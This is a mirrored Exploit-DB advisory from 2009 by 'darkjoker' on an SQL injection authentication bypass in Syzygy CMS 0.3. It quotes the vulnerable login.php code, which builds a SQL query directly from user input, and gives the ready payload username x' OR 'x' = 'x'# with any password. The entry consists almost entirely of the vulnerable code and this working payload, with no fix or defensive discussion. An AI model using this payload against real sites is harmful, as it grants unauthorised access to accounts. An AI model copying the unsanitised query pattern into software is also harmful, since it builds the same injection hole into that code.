- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 7759
- Проверка EDB
-
- Пройдено
- Автор
- DARKJOKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2009-01-14
Код:
--+++=========================================================================+++--
--+++====== Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++=========================================================================+++--
[+] Syzygy CMS <= 0.3 (Auth Bypass) SQL Injection Vulnerability
[+] Author : darkjoker
[+] Site : http://darkjoker.net23.net
[+] Greetz : my girlfriend, Vivi
[+] File : login.php
[+] Code:
17 $username=$_POST['username'];
18 $password=md5($_POST['password']);
19 $current_login=mysql_query("SELECT * FROM ".$mysql_prefix."users WHERE username='".$username."' AND password='".$password."'");
20
21 if (mysql_num_rows($current_login)==0)
22 {
23 header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/"."index.php?page=invalid.php");
24 } else {
25 $current_user=mysql_fetch_array($current_login, MYSQL_ASSOC);
26 $_SESSION['user']=$current_user['username'];
27 $_SESSION['perms']=$current_user['perms'];
28 $style_query=mysql_query("SELECT filename FROM ".$mysql_prefix."layout_style WHERE id='".$current_user['style']."'");
29 $style_info=mysql_fetch_array($style_query,MYSQL_ASSOC);
30 $_SESSION['style']=$style_info['filename'];
31 header("Location: http://".$_SERVER['HTTP_HOST'].dirname($_SERVER['PHP_SELF'])."/"."index.php");
32 }
[+] Username: x' OR 'x' = 'x'#
[+] Password: anything
# milw0rm.com [2009-01-14]
- Источник
- www.exploit-db.com